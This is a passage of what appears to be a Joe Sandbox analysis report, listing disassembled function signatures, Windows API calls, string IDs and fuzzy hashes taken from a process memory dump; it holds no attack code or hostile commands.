                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                    • API String ID: 3730832054-3931177956
                                                    • Opcode ID: 730379b8e0bb80834e1d5b159047e067a516316dad1f43baeb73f0d69cf80324
                                                    • Instruction ID: a83e50969b77b4d089c47d2ecf2fba027d3547b4b808e179b8bd19f6f456892c
                                                    • Opcode Fuzzy Hash: 730379b8e0bb80834e1d5b159047e067a516316dad1f43baeb73f0d69cf80324
                                                    • Instruction Fuzzy Hash: 9CD1D171604515EBDBA09F69D888B6EB7B4FF04B00F188557E419AB381DF38ED40DBA2
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 007F4A61
                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007F4AAC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: BuffCharMessageSendUpper
                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                    • API String ID: 3974292440-4258414348
                                                    • Opcode ID: ac496718d02e2cf59f870744930a61241445243b0e6f34d01b9813eefbdc8db1
                                                    • Instruction ID: 03e60bb308e52ad6f9044c1e2e313743c000c1c9e2c9137d6ef84b9491149c0b
                                                    • Opcode Fuzzy Hash: ac496718d02e2cf59f870744930a61241445243b0e6f34d01b9813eefbdc8db1
                                                    • Instruction Fuzzy Hash: 51918970200715DFCB14EF20C855A7AB7A1BF94354F10885CFA965B3A2CB38ED4ACB92
                                                    APIs
                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007FBF26
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,007F97E7), ref: 007FBF82
                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007FBFBB
                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 007FBFFE
                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007FC035
                                                    • FreeLibrary.KERNEL32(?), ref: 007FC041
                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007FC051
                                                    • DestroyIcon.USER32(?,?,?,?,?,007F97E7), ref: 007FC060
                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 007FC07D
                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 007FC089
                                                      • Part of subcall function 0079312D: __wcsicmp_l.LIBCMT ref: 007931B6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                    • String ID: .dll$.exe$.icl
                                                    • API String ID: 1212759294-1154884017
                                                    • Opcode ID: 5a710edfbb141c65a9cc30919d0e9c466881aab0ee61322cfccaef890d1185a0
                                                    • Instruction ID: 482a72a68e8bf4c98d85521578ded259146a445d22ac1e5f50fa73caa56eb017
                                                    • Opcode Fuzzy Hash: 5a710edfbb141c65a9cc30919d0e9c466881aab0ee61322cfccaef890d1185a0
                                                    • Instruction Fuzzy Hash: F861FF7160021CFEEB15DF64DD85BBE77A8FB08710F104209FA15D62D1DB79AA81DBA0
                                                    APIs
                                                    • GetLocalTime.KERNEL32(?), ref: 007DE31F
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 007DE32F
                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 007DE33B
                                                    • __wsplitpath.LIBCMT ref: 007DE399
                                                    • _wcscat.LIBCMT ref: 007DE3B1
                                                    • _wcscat.LIBCMT ref: 007DE3C3
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007DE3D8
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007DE3EC
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007DE41E
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007DE43F
                                                    • _wcscpy.LIBCMT ref: 007DE44B
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 007DE48A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                    • String ID: *.*
                                                    • API String ID: 3566783562-438819550
                                                    • Opcode ID: 702e8acddc4ab1acc41cb96e0a9c5294cb76a21a2ad181262061aeda234cbd7f
                                                    • Instruction ID: faff6061c0f7c0c0721907221ac1108f60481ade9102d2ecc0471562f7736a1d
                                                    • Opcode Fuzzy Hash: 702e8acddc4ab1acc41cb96e0a9c5294cb76a21a2ad181262061aeda234cbd7f
                                                    • Instruction Fuzzy Hash: FF6139725047459FCB11EF60C848A9EB3F8BF89310F04891EF98987251DB39E945CB92
                                                    APIs
                                                    • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 007DA2C2
                                                      • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                    • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 007DA2E3
                                                    • __swprintf.LIBCMT ref: 007DA33C
                                                    • __swprintf.LIBCMT ref: 007DA355
                                                    • _wprintf.LIBCMT ref: 007DA3FC
                                                    • _wprintf.LIBCMT ref: 007DA41A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: LoadString__swprintf_wprintf$_memmove
                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                    • API String ID: 311963372-3080491070
                                                    • Opcode ID: 4e0d558ce69c0ddc5eca318db849e61ac8e786cb6e5e092da6517e9e70139d03
                                                    • Instruction ID: 6fe24bf3e8ac3bbf9c94635811f1e480c60819c7c8ff8bda0650fec2cc3b3114
                                                    • Opcode Fuzzy Hash: 4e0d558ce69c0ddc5eca318db849e61ac8e786cb6e5e092da6517e9e70139d03
                                                    • Instruction Fuzzy Hash: 9051AC71940219EACF24FBE0DD4AEEEB779BF04340F500166F405A2192EB392E5ACB61
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000001,?,007BF8B8,00000001,0000138C,00000001,00000001,00000001,?,007E3FF9,00000001), ref: 007D009A
                                                    • LoadStringW.USER32(00000000,?,007BF8B8,00000001), ref: 007D00A3
                                                      • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                    • GetModuleHandleW.KERNEL32(00000000,00837310,?,00000FFF,?,?,007BF8B8,00000001,0000138C,00000001,00000001,00000001,?,007E3FF9,00000001,00000001), ref: 007D00C5
                                                    • LoadStringW.USER32(00000000,?,007BF8B8,00000001), ref: 007D00C8
                                                    • __swprintf.LIBCMT ref: 007D0118
                                                    • __swprintf.LIBCMT ref: 007D0129
                                                    • _wprintf.LIBCMT ref: 007D01D2
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007D01E9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                    • API String ID: 984253442-2268648507
                                                    • Opcode ID: fecea5b55a365d5ace96353518dab55a18a634ecb3f9764f50d6a5396c46a4be
                                                    • Instruction ID: 0bbc4d95dfd84d5bd7a4d6c5d9d4b681df060981c1969a569e16b4ebc93ed593
                                                    • Opcode Fuzzy Hash: fecea5b55a365d5ace96353518dab55a18a634ecb3f9764f50d6a5396c46a4be
                                                    • Instruction Fuzzy Hash: 29413F72840219EACF14FBE0DD9AEEEB77DEF14340F900155F505A2192DA396F4ACBA1
                                                    APIs
                                                      • Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
                                                      • Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC
                                                    • CharLowerBuffW.USER32(?,?), ref: 007DAA0E
                                                    • GetDriveTypeW.KERNEL32 ref: 007DAA5B
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007DAAA3
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007DAADA
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007DAB08
                                                      • Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                    • API String ID: 2698844021-4113822522
                                                    • Opcode ID: 5d6d6675abf976b4bdd359f1d4a59e7484774c40b7878e4165eb49dc73415c0f
                                                    • Instruction ID: d7ca05c1da3260f2662f1152f2f05840dcda19c10f0d0814750bbddd97110a59
                                                    • Opcode Fuzzy Hash: 5d6d6675abf976b4bdd359f1d4a59e7484774c40b7878e4165eb49dc73415c0f
                                                    • Instruction Fuzzy Hash: 47514971204205EFC700EF20D88596AB3F8FF94758F50896DF895972A1DB39AD0ACB92
                                                    APIs
                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 007DA852
                                                    • __swprintf.LIBCMT ref: 007DA874
                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 007DA8B1
                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 007DA8D6
                                                    • _memset.LIBCMT ref: 007DA8F5
                                                    • _wcsncpy.LIBCMT ref: 007DA931
                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 007DA966
                                                    • CloseHandle.KERNEL32(00000000), ref: 007DA971
                                                    • RemoveDirectoryW.KERNEL32(?), ref: 007DA97A
                                                    • CloseHandle.KERNEL32(00000000), ref: 007DA984
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                    • String ID: :$\$\??\%s
                                                    • API String ID: 2733774712-3457252023
                                                    • Opcode ID: e3c6526f374e343ecae185e344c54876620da8a1d7ccda66d5c82b7e96870217
                                                    • Instruction ID: b1bf7a3c3a6e5a8305ae805fc7d560bba8e475aabbfe62f1c3b8dd58dbdfa4dc
                                                    • Opcode Fuzzy Hash: e3c6526f374e343ecae185e344c54876620da8a1d7ccda66d5c82b7e96870217
                                                    • Instruction Fuzzy Hash: AB3172B1900219BBDB219FA0DC49FEB77BCFF89700F1041A6F909D6160EB7496458B25
                                                    APIs
                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,007F982C,?,?), ref: 007FC0C8
                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,007F982C,?,?,00000000,?), ref: 007FC0DF
                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,007F982C,?,?,00000000,?), ref: 007FC0EA
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,007F982C,?,?,00000000,?), ref: 007FC0F7
                                                    • GlobalLock.KERNEL32(00000000,?,?,?,?,007F982C,?,?,00000000,?), ref: 007FC100
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,007F982C,?,?,00000000,?), ref: 007FC10F
                                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,?,007F982C,?,?,00000000,?), ref: 007FC118
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,007F982C,?,?,00000000,?), ref: 007FC11F
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,007F982C,?,?,00000000,?), ref: 007FC130
                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00803C7C,?), ref: 007FC149
                                                    • GlobalFree.KERNEL32(00000000), ref: 007FC159
                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 007FC17D
                                                    • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 007FC1A8
                                                    • DeleteObject.GDI32(00000000), ref: 007FC1D0
                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 007FC1E6
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                    • String ID:
                                                    • API String ID: 3840717409-0
                                                    • Opcode ID: c9bb940a85701a31db793b701cbb132586398a8b192edf00665ebef09e442321
                                                    • Instruction ID: 15a4c91af5414fb111b0826c2f38e6d30d2910c93451207f60a79cdcd9e4ddda
                                                    • Opcode Fuzzy Hash: c9bb940a85701a31db793b701cbb132586398a8b192edf00665ebef09e442321
                                                    • Instruction Fuzzy Hash: 3641497160020CEFDB629F64DD88EAA7BB9FF89711F104058FA09E7260DB349941DF60
                                                    APIs
                                                    • __wsplitpath.LIBCMT ref: 007DE053
                                                    • _wcscat.LIBCMT ref: 007DE06B
                                                    • _wcscat.LIBCMT ref: 007DE07D
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007DE092
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007DE0A6
                                                    • GetFileAttributesW.KERNEL32(?), ref: 007DE0BE
                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 007DE0D8
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007DE0EA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                    • String ID: *.*
                                                    • API String ID: 34673085-438819550
                                                    • Opcode ID: e9a48bd55bd8c765bbc1ce14aa1ded0cef34d9f78740f565d246ac40da81e0bf
                                                    • Instruction ID: 9f0794e43504cba477582d37d12ce725700e7ed7c949bde67b531072a8a80d51
                                                    • Opcode Fuzzy Hash: e9a48bd55bd8c765bbc1ce14aa1ded0cef34d9f78740f565d246ac40da81e0bf
                                                    • Instruction Fuzzy Hash: 97816F716043459FCB34EF64C84496AB7F8AB99310F18882BF49AC7351E738ED45CB52
                                                    APIs
                                                      • Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3
                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007FC8A4
                                                    • GetFocus.USER32 ref: 007FC8B4
                                                    • GetDlgCtrlID.USER32(00000000), ref: 007FC8BF
                                                    • _memset.LIBCMT ref: 007FC9EA
                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 007FCA15
                                                    • GetMenuItemCount.USER32(?), ref: 007FCA35
                                                    • GetMenuItemID.USER32(?,00000000), ref: 007FCA48
                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 007FCA7C
                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 007FCAC4
                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007FCAFC
                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 007FCB31
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                    • String ID: 0
                                                    • API String ID: 1296962147-4108050209
                                                    • Opcode ID: 98b6c6350331a34436b9e2a9a4c3690c81d76c86618700d30cf822a43e4f6775
                                                    • Instruction ID: 1e39ef658cfa69bacb43d675871278810c3b7fac8f8f01c34d7a84ef50120ffc
                                                    • Opcode Fuzzy Hash: 98b6c6350331a34436b9e2a9a4c3690c81d76c86618700d30cf822a43e4f6775
                                                    • Instruction Fuzzy Hash: 53816CB06083099FD721CF14CA85A7A7BE9FB88354F00492DFA95A3391C774E905CFA2
                                                    APIs
                                                      • Part of subcall function 007C8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007C8E3C
                                                      • Part of subcall function 007C8E20: GetLastError.KERNEL32(?,007C8900,?,?,?), ref: 007C8E46
                                                      • Part of subcall function 007C8E20: GetProcessHeap.KERNEL32(00000008,?,?,007C8900,?,?,?), ref: 007C8E55
                                                      • Part of subcall function 007C8E20: HeapAlloc.KERNEL32(00000000,?,007C8900,?,?,?), ref: 007C8E5C
                                                      • Part of subcall function 007C8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007C8E73
                                                      • Part of subcall function 007C8EBD: GetProcessHeap.KERNEL32(00000008,007C8916,00000000,00000000,?,007C8916,?), ref: 007C8EC9
                                                      • Part of subcall function 007C8EBD: HeapAlloc.KERNEL32(00000000,?,007C8916,?), ref: 007C8ED0
                                                      • Part of subcall function 007C8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,007C8916,?), ref: 007C8EE1
                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007C8B2E
                                                    • _memset.LIBCMT ref: 007C8B43
                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 007C8B62
                                                    • GetLengthSid.ADVAPI32(?), ref: 007C8B73
                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 007C8BB0
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007C8BCC
                                                    • GetLengthSid.ADVAPI32(?), ref: 007C8BE9
                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 007C8BF8
                                                    • HeapAlloc.KERNEL32(00000000), ref: 007C8BFF
                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 007C8C20
                                                    • CopySid.ADVAPI32(00000000), ref: 007C8C27
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 007C8C58
                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007C8C7E
                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 007C8C92
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                    • String ID:
                                                    • API String ID: 3996160137-0
                                                    • Opcode ID: 234397cbf12c7809a9d9ad1e8578972956ed35b0c6e8b3e9fbf49048902a32f3
                                                    • Instruction ID: f723a31925bc5fc7abb3c3e3e0d073393d2e705b3120551a48b4fccbcdcf3064
                                                    • Opcode Fuzzy Hash: 234397cbf12c7809a9d9ad1e8578972956ed35b0c6e8b3e9fbf49048902a32f3
                                                    • Instruction Fuzzy Hash: 3E613771A00209EFDF509FA4DC45FAEBB79FF04300F0481AEE915A6291EB399A05CB61
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 007E7A79
                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 007E7A85
                                                    • CreateCompatibleDC.GDI32(?), ref: 007E7A91
                                                    • SelectObject.GDI32(00000000,?), ref: 007E7A9E
                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 007E7AF2
                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 007E7B2E
                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 007E7B52
                                                    • SelectObject.GDI32(00000006,?), ref: 007E7B5A
                                                    • DeleteObject.GDI32(?), ref: 007E7B63
                                                    • DeleteDC.GDI32(00000006), ref: 007E7B6A
                                                    • ReleaseDC.USER32(00000000,?), ref: 007E7B75
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
